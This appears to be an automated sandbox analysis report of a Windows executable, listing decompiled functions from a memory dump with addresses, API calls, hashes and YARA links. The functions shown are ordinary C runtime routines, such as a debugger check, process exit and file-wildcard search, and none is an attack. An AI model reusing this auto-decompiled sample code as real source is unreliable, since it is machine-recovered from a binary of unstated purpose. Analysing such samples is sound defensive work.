                                                                                                                0x00ee29b1
                                                                                                                0x00ee29b1
                                                                                                                0x00ee2a6a
                                                                                                                0x00ee2a6a
                                                                                                                0x00ee2a6c
                                                                                                                0x00000000
                                                                                                                0x00ee2a72
                                                                                                                0x00ee2a72
                                                                                                                0x00ee2a78
                                                                                                                0x00ee2a7b
                                                                                                                0x00ee29be
                                                                                                                0x00ee29c5
                                                                                                                0x00000000
                                                                                                                0x00ee2a81
                                                                                                                0x00ee2a83
                                                                                                                0x00ee2a89
                                                                                                                0x00ee2a8f
                                                                                                                0x00ee2a90
                                                                                                                0x00ee2c87
                                                                                                                0x00ee2c87
                                                                                                                0x00ee2c8e
                                                                                                                0x00ee2c8f
                                                                                                                0x00ee2c90
                                                                                                                0x00ee2c95
                                                                                                                0x00ee2c98
                                                                                                                0x00ee2c98
                                                                                                                0x00ee2a7b
                                                                                                                0x00ee2a6c
                                                                                                                0x00ee2983
                                                                                                                0x00ee2960
                                                                                                                0x00ee2960
                                                                                                                0x00ee2962
                                                                                                                0x00ee2968
                                                                                                                0x00ee2c12
                                                                                                                0x00ee2c12
                                                                                                                0x00ee2c13
                                                                                                                0x00ee2c19
                                                                                                                0x00ee2c19
                                                                                                                0x00ee2c20
                                                                                                                0x00ee2c21
                                                                                                                0x00ee2c22
                                                                                                                0x00ee2c27
                                                                                                                0x00ee2c2a
                                                                                                                0x00ee2c2a
                                                                                                                0x00ee2c2a
                                                                                                                0x00ee295e
                                                                                                                0x00ee2c2c
                                                                                                                0x00ee2c2c
                                                                                                                0x00ee2c2e
                                                                                                                0x00ee2c9c
                                                                                                                0x00ee2ca3
                                                                                                                0x00ee2ca3
                                                                                                                0x00ee2ca3
                                                                                                                0x00ee2caa
                                                                                                                0x00ee2cac
                                                                                                                0x00ee2cb2
                                                                                                                0x00ee2cb3
                                                                                                                0x00ee315f
                                                                                                                0x00ee315f
                                                                                                                0x00ee3160
                                                                                                                0x00ee3161
                                                                                                                0x00ee3166
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ee2c30
                                                                                                                0x00ee2c36
                                                                                                                0x00ee2c36
                                                                                                                0x00ee2c3c
                                                                                                                0x00ee2c3c
                                                                                                                0x00ee2c48
                                                                                                                0x00000000
                                                                                                                0x00ee2c48
                                                                                                                0x00ee28d7
                                                                                                                0x00ee3169
                                                                                                                0x00ee3169
                                                                                                                0x00ee316f
                                                                                                                0x00ee3171
                                                                                                                0x00ee3177
                                                                                                                0x00ee317d
                                                                                                                0x00ee317f
                                                                                                                0x00ee3181
                                                                                                                0x00ee3183
                                                                                                                0x00ee3183
                                                                                                                0x00ee3185
                                                                                                                0x00ee3185
                                                                                                                0x00ee318e
                                                                                                                0x00ee318f
                                                                                                                0x00ee3193
                                                                                                                0x00ee319a
                                                                                                                0x00ee319d
                                                                                                                0x00ee319e
                                                                                                                0x00ee31a0
                                                                                                                0x00ee31a0
                                                                                                                0x00ee31a4
                                                                                                                0x00ee31aa
                                                                                                                0x00ee31ac
                                                                                                                0x00ee31b2
                                                                                                                0x00ee31b4
                                                                                                                0x00ee31ba
                                                                                                                0x00ee31bd
                                                                                                                0x00ee31d0
                                                                                                                0x00ee31d2
                                                                                                                0x00ee31d3
                                                                                                                0x00ee31d9
                                                                                                                0x00ee31e5
                                                                                                                0x00ee31ec
                                                                                                                0x00ee31ed
                                                                                                                0x00ee31ee
                                                                                                                0x00ee31f3
                                                                                                                0x00ee31bf
                                                                                                                0x00ee31c1
                                                                                                                0x00ee31c8
                                                                                                                0x00ee31c8
                                                                                                                0x00ee31bd
                                                                                                                0x00ee31f6
                                                                                                                0x00ee31f6
                                                                                                                0x00ee3206
                                                                                                                0x00ee320f
                                                                                                                0x00ee3210
                                                                                                                0x00ee3212
                                                                                                                0x00ee32a9
                                                                                                                0x00ee32ab
                                                                                                                0x00ee32b6
                                                                                                                0x00ee32b6
                                                                                                                0x00ee32b8
                                                                                                                0x00ee32bb
                                                                                                                0x00ee32bd
                                                                                                                0x00000000
                                                                                                                0x00ee32ad
                                                                                                                0x00ee32b3
                                                                                                                0x00ee32b3
                                                                                                                0x00ee3218
                                                                                                                0x00ee3218
                                                                                                                0x00ee321e
                                                                                                                0x00ee3221
                                                                                                                0x00ee3227
                                                                                                                0x00ee322a
                                                                                                                0x00ee3230
                                                                                                                0x00ee3232
                                                                                                                0x00ee3238
                                                                                                                0x00ee323a
                                                                                                                0x00ee323c
                                                                                                                0x00ee323c
                                                                                                                0x00ee323e
                                                                                                                0x00ee323e
                                                                                                                0x00ee324b
                                                                                                                0x00ee3252
                                                                                                                0x00ee3255
                                                                                                                0x00ee3256
                                                                                                                0x00ee3258
                                                                                                                0x00ee3259
                                                                                                                0x00ee3259
                                                                                                                0x00ee325d
                                                                                                                0x00ee3263
                                                                                                                0x00ee3265
                                                                                                                0x00ee3267
                                                                                                                0x00ee326d
                                                                                                                0x00ee3270
                                                                                                                0x00ee3283
                                                                                                                0x00ee3284
                                                                                                                0x00ee328a
                                                                                                                0x00ee3296
                                                                                                                0x00ee329d
                                                                                                                0x00ee329e
                                                                                                                0x00ee329f
                                                                                                                0x00ee32a4
                                                                                                                0x00ee3272
                                                                                                                0x00ee3272
                                                                                                                0x00ee3279
                                                                                                                0x00ee3279
                                                                                                                0x00ee3270
                                                                                                                0x00ee3265
                                                                                                                0x00ee32c3
                                                                                                                0x00ee32c3
                                                                                                                0x00ee32c3
                                                                                                                0x00ee32cf
                                                                                                                0x00ee32d2
                                                                                                                0x00ee32d8
                                                                                                                0x00ee32da
                                                                                                                0x00ee32dc
                                                                                                                0x00ee32e2
                                                                                                                0x00ee32e4
                                                                                                                0x00ee32e4
                                                                                                                0x00ee32e4
                                                                                                                0x00ee32e2
                                                                                                                0x00ee32e9
                                                                                                                0x00ee32ea
                                                                                                                0x00ee32ec
                                                                                                                0x00ee32ee
                                                                                                                0x00ee32ee
                                                                                                                0x00ee32f0
                                                                                                                0x00ee32f6
                                                                                                                0x00ee32fc
                                                                                                                0x00ee32fe
                                                                                                                0x00ee3304
                                                                                                                0x00ee3304
                                                                                                                0x00ee330a
                                                                                                                0x00ee330c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ee3312
                                                                                                                0x00ee3314
                                                                                                                0x00ee3316
                                                                                                                0x00ee3316
                                                                                                                0x00ee3318
                                                                                                                0x00ee3318
                                                                                                                0x00ee3328
                                                                                                                0x00ee332f
                                                                                                                0x00ee3332
                                                                                                                0x00ee3333
                                                                                                                0x00ee3335
                                                                                                                0x00ee3335
                                                                                                                0x00ee3339
                                                                                                                0x00ee333f
                                                                                                                0x00ee3341
                                                                                                                0x00ee3343
                                                                                                                0x00ee3349
                                                                                                                0x00ee334c
                                                                                                                0x00ee335d
                                                                                                                0x00ee335f
                                                                                                                0x00ee3360
                                                                                                                0x00ee3366
                                                                                                                0x00ee3372
                                                                                                                0x00ee3379
                                                                                                                0x00ee337a
                                                                                                                0x00ee337b
                                                                                                                0x00ee3380
                                                                                                                0x00ee334e
                                                                                                                0x00ee334e
                                                                                                                0x00ee3355
                                                                                                                0x00ee3355
                                                                                                                0x00ee334c
                                                                                                                0x00ee3391
                                                                                                                0x00ee33a0
                                                                                                                0x00ee33a1
                                                                                                                0x00ee33a1
                                                                                                                0x00ee33a3
                                                                                                                0x00ee33a5
                                                                                                                0x00ee33a5
                                                                                                                0x00ee33ab
                                                                                                                0x00ee33ae
                                                                                                                0x00ee33b0
                                                                                                                0x00ee33b2
                                                                                                                0x00ee33b2
                                                                                                                0x00ee33b5
                                                                                                                0x00ee33b6
                                                                                                                0x00ee33b6
                                                                                                                0x00ee33bb
                                                                                                                0x00ee33be
                                                                                                                0x00ee33c2
                                                                                                                0x00ee33c2
                                                                                                                0x00ee33c3
                                                                                                                0x00ee33c5
                                                                                                                0x00ee33cb
                                                                                                                0x00ee33d1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ee33d1
                                                                                                                0x00ee3304
                                                                                                                0x00ee33d7
                                                                                                                0x00ee33d7
                                                                                                                0x00000000
                                                                                                                0x00ee33d7
                                                                                                                0x00ee215c
                                                                                                                0x00ee2153
                                                                                                                0x00ee214a
                                                                                                                0x00ee2101
                                                                                                                0x00ee2105
                                                                                                                0x00ee210d
                                                                                                                0x00000000
                                                                                                                0x00ee210f
                                                                                                                0x00ee2115
                                                                                                                0x00ee211a
                                                                                                                0x00ee33f6
                                                                                                                0x00ee33f6
                                                                                                                0x00ee33f9
                                                                                                                0x00ee3404
                                                                                                                0x00ee342f
                                                                                                                0x00ee3430
                                                                                                                0x00ee3431
                                                                                                                0x00ee3432
                                                                                                                0x00ee3433
                                                                                                                0x00ee3434
                                                                                                                0x00ee3439
                                                                                                                0x00ee343c
                                                                                                                0x00ee343f
                                                                                                                0x00ee3440
                                                                                                                0x00ee3443
                                                                                                                0x00ee3445
                                                                                                                0x00ee344b
                                                                                                                0x00ee344e
                                                                                                                0x00ee3450
                                                                                                                0x00ee3465
                                                                                                                0x00ee3466
                                                                                                                0x00ee3469
                                                                                                                0x00ee346b
                                                                                                                0x00ee3481
                                                                                                                0x00ee3487
                                                                                                                0x00ee348f
                                                                                                                0x00ee3491
                                                                                                                0x00ee349c
                                                                                                                0x00ee349f
                                                                                                                0x00ee34b6
                                                                                                                0x00ee34a1
                                                                                                                0x00ee34a1
                                                                                                                0x00ee34a6
                                                                                                                0x00000000
                                                                                                                0x00ee34a6
                                                                                                                0x00ee3493
                                                                                                                0x00ee3493
                                                                                                                0x00ee3498
                                                                                                                0x00ee34a8
                                                                                                                0x00ee34a8
                                                                                                                0x00ee34a9
                                                                                                                0x00ee34ab
                                                                                                                0x00ee34b0
                                                                                                                0x00ee34b0
                                                                                                                0x00ee346d
                                                                                                                0x00ee346d
                                                                                                                0x00ee3470
                                                                                                                0x00000000
                                                                                                                0x00ee3472
                                                                                                                0x00ee3475
                                                                                                                0x00ee347d
                                                                                                                0x00ee347d
                                                                                                                0x00ee3470
                                                                                                                0x00ee3452
                                                                                                                0x00ee3452
                                                                                                                0x00ee3459
                                                                                                                0x00ee345a
                                                                                                                0x00ee345c
                                                                                                                0x00ee3461
                                                                                                                0x00ee3461
                                                                                                                0x00ee3447
                                                                                                                0x00ee3447
                                                                                                                0x00ee3447
                                                                                                                0x00ee34ba
                                                                                                                0x00ee3406
                                                                                                                0x00ee3406
                                                                                                                0x00ee3406
                                                                                                                0x00ee3410
                                                                                                                0x00ee3419
                                                                                                                0x00ee341e
                                                                                                                0x00ee342c
                                                                                                                0x00ee342c
                                                                                                                0x00ee3404
                                                                                                                0x00ee210d

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: __floor_pentium4
                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                • Opcode ID: f0ea024fe7f4581e295d6feea1dd035756d806f1340ec73143206ea2ef26fa88
                                                                                                                • Instruction ID: f23521eda0671c326cfe01a2416e3d0e3428c354d6c8e4ff0a69ef769a9a9d07
                                                                                                                • Opcode Fuzzy Hash: f0ea024fe7f4581e295d6feea1dd035756d806f1340ec73143206ea2ef26fa88
                                                                                                                • Instruction Fuzzy Hash: 52C23771E0866C8FDB25CE299D447EAB3B9EB48308F1551EAD94DF7240E774AE818F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDD6D2, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E00EDD6D2(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0xef1558; // 0xf529bb33
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00ED4011(_t41);
					_pop(_t62);
				}
				E00ED4440(_t67,  &_v804, 0, 0x50);
				E00ED4440(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00ED4011(_t57);
				}
				return E00ED3C6A(_v8 ^ _t70);
			}




































                                                                                                                0x00edd6d2
                                                                                                                0x00edd6d2
                                                                                                                0x00edd6d2
                                                                                                                0x00edd6d2
                                                                                                                0x00edd6dd
                                                                                                                0x00edd6e2
                                                                                                                0x00edd6e4
                                                                                                                0x00edd6ec
                                                                                                                0x00edd6ee
                                                                                                                0x00edd6f1
                                                                                                                0x00edd6f6
                                                                                                                0x00edd6f6
                                                                                                                0x00edd702
                                                                                                                0x00edd715
                                                                                                                0x00edd723
                                                                                                                0x00edd729
                                                                                                                0x00edd72f
                                                                                                                0x00edd735
                                                                                                                0x00edd73b
                                                                                                                0x00edd741
                                                                                                                0x00edd747
                                                                                                                0x00edd74d
                                                                                                                0x00edd753
                                                                                                                0x00edd759
                                                                                                                0x00edd760
                                                                                                                0x00edd767
                                                                                                                0x00edd76e
                                                                                                                0x00edd775
                                                                                                                0x00edd77c
                                                                                                                0x00edd783
                                                                                                                0x00edd784
                                                                                                                0x00edd78d
                                                                                                                0x00edd793
                                                                                                                0x00edd796
                                                                                                                0x00edd79c
                                                                                                                0x00edd7a9
                                                                                                                0x00edd7b2
                                                                                                                0x00edd7bb
                                                                                                                0x00edd7c4
                                                                                                                0x00edd7d2
                                                                                                                0x00edd7d4
                                                                                                                0x00edd7e9
                                                                                                                0x00edd7f5
                                                                                                                0x00edd7f8
                                                                                                                0x00edd7fd
                                                                                                                0x00edd80c

                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00EDD7CA
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00EDD7D4
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00EDD7E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                • String ID:
                                                                                                                • API String ID: 3906539128-0
                                                                                                                • Opcode ID: 8b7fa046e17d2e16bbf2e442735f84260bfe9f4805d99ac0d8875579ed21dbc9
                                                                                                                • Instruction ID: 3081d586b27ad94fe51bad1066d1664c54ea7ccc6318a061cdb1a4b7dfe80a97
                                                                                                                • Opcode Fuzzy Hash: 8b7fa046e17d2e16bbf2e442735f84260bfe9f4805d99ac0d8875579ed21dbc9
                                                                                                                • Instruction Fuzzy Hash: FA31B5B490121C9BCB21DF65DC8979DBBB4EF18310F5051DAE41CA7291E7709F868F45
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDC507, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EDC507(int _a4) {
				void* _t14;
				void* _t16;

				if(E00EDF906(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00EDC548(_t14, _t16, _a4);
				ExitProcess(_a4);
			}





                                                                                                                0x00edc513
                                                                                                                0x00edc52f
                                                                                                                0x00edc52f
                                                                                                                0x00edc538
                                                                                                                0x00edc541

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000003,?,00EDC4DD,00000003,00EEF368,0000000C,00EDC5F0,00000003,00000002,00000000,?,00EDD674,00000003), ref: 00EDC528
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00EDC4DD,00000003,00EEF368,0000000C,00EDC5F0,00000003,00000002,00000000,?,00EDD674,00000003), ref: 00EDC52F
                                                                                                                • ExitProcess.KERNEL32 ref: 00EDC541
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1703294689-0
                                                                                                                • Opcode ID: 92e2bb7d3c68a6a92444bef86fb90beedf409f2adc5ff83b29dfde21a4a6ae46
                                                                                                                • Instruction ID: 20091096c3a2bf65d5b0e9bf02bbccc77f0b2289b594d2c6abeaf357943aee84
                                                                                                                • Opcode Fuzzy Hash: 92e2bb7d3c68a6a92444bef86fb90beedf409f2adc5ff83b29dfde21a4a6ae46
                                                                                                                • Instruction Fuzzy Hash: 97E0463200424CAFCF016F65EC49A583B69EB44381B905055F846AA221CB35FD43CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDFB78, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E00EDFB78(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E00EDD675(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E00EE3932(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E00EDFDB7(_a16, __eflags, _t111);
							E00EDD5AA(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E00EE3932(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00EDD8AC();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0xef1558; // 0xf529bb33
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E00EE3980(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E00ED4440(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00EDFB78(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E00EDAAF0(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E00EDF9D0);
									}
								} else {
									_push(_t55);
									_t57 = E00EDFB78(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E00EDFB78(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E00ED3C6A(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}















































                                                                                                                0x00edfb7d
                                                                                                                0x00edfb7e
                                                                                                                0x00edfb81
                                                                                                                0x00edfb81
                                                                                                                0x00edfb84
                                                                                                                0x00edfb84
                                                                                                                0x00edfb86
                                                                                                                0x00edfb87
                                                                                                                0x00edfb90
                                                                                                                0x00edfb91
                                                                                                                0x00edfb94
                                                                                                                0x00edfb97
                                                                                                                0x00edfb9c
                                                                                                                0x00edfba3
                                                                                                                0x00edfba4
                                                                                                                0x00edfba5
                                                                                                                0x00edfba8
                                                                                                                0x00edfbb2
                                                                                                                0x00edfbb5
                                                                                                                0x00edfbb6
                                                                                                                0x00edfbb8
                                                                                                                0x00edfbcc
                                                                                                                0x00edfbcc
                                                                                                                0x00edfbcf
                                                                                                                0x00edfbd9
                                                                                                                0x00edfbde
                                                                                                                0x00edfbe1
                                                                                                                0x00edfbe3
                                                                                                                0x00000000
                                                                                                                0x00edfbe5
                                                                                                                0x00edfbe9
                                                                                                                0x00edfbf2
                                                                                                                0x00edfbf8
                                                                                                                0x00000000
                                                                                                                0x00edfbfb
                                                                                                                0x00edfbba
                                                                                                                0x00edfbba
                                                                                                                0x00edfbc0
                                                                                                                0x00edfbc5
                                                                                                                0x00edfbc8
                                                                                                                0x00edfbca
                                                                                                                0x00edfc01
                                                                                                                0x00edfc03
                                                                                                                0x00edfc04
                                                                                                                0x00edfc05
                                                                                                                0x00edfc06
                                                                                                                0x00edfc07
                                                                                                                0x00edfc08
                                                                                                                0x00edfc0d
                                                                                                                0x00edfc11
                                                                                                                0x00edfc13
                                                                                                                0x00edfc19
                                                                                                                0x00edfc20
                                                                                                                0x00edfc23
                                                                                                                0x00edfc26
                                                                                                                0x00edfc27
                                                                                                                0x00edfc2a
                                                                                                                0x00edfc2b
                                                                                                                0x00edfc2e
                                                                                                                0x00edfc2f
                                                                                                                0x00edfc50
                                                                                                                0x00edfc50
                                                                                                                0x00edfc52
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edfc37
                                                                                                                0x00edfc39
                                                                                                                0x00edfc3b
                                                                                                                0x00edfc3d
                                                                                                                0x00edfc3f
                                                                                                                0x00edfc41
                                                                                                                0x00edfc43
                                                                                                                0x00edfc4e
                                                                                                                0x00000000
                                                                                                                0x00edfc4e
                                                                                                                0x00edfc43
                                                                                                                0x00edfc3f
                                                                                                                0x00000000
                                                                                                                0x00edfc3b
                                                                                                                0x00edfc54
                                                                                                                0x00edfc56
                                                                                                                0x00edfc59
                                                                                                                0x00edfc72
                                                                                                                0x00edfc72
                                                                                                                0x00edfc74
                                                                                                                0x00edfc77
                                                                                                                0x00edfc87
                                                                                                                0x00edfc89
                                                                                                                0x00edfc89
                                                                                                                0x00edfc79
                                                                                                                0x00edfc79
                                                                                                                0x00edfc7c
                                                                                                                0x00000000
                                                                                                                0x00edfc7e
                                                                                                                0x00edfc7e
                                                                                                                0x00edfc81
                                                                                                                0x00000000
                                                                                                                0x00edfc83
                                                                                                                0x00edfc83
                                                                                                                0x00edfc83
